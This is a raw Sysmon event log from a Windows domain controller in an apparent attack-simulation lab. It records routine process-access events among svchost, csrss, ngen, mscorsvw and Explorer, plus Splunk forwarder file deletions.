21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.671{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A242-60D3-A304-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.656{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A242-60D3-A304-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.656{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A242-60D3-A304-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.640{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F3C89A7A5D3785F0C875D969E444F58,SHA256=0DED57A43847112AC2E077A035B30DA27B189F07B47D995D0EEDFE1A8C6A9068,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.593{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A242-60D3-A204-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.578{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A242-60D3-A204-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.578{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A242-60D3-A204-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:10.515{4DB9351A-A242-60D3-A104-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1984-0\System.Management.Instrumentation.dll2021-06-23 21:06:10.515 23542300x800000000000000021811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.468{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F32382012D0FFF26839C3B21A985F10,SHA256=42D06A649C4C23FFA4294DA63C7FE73CC9C509A9AE278C2D9F34E81426812B87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.468{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D0DDF79133C5A17C5FDC364D2EF008A,SHA256=FDBA100414536A0B5255912C320823F840B36FD41982AABEB4B5CB2459F5526F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.359{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A242-60D3-A104-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.343{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A242-60D3-A104-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 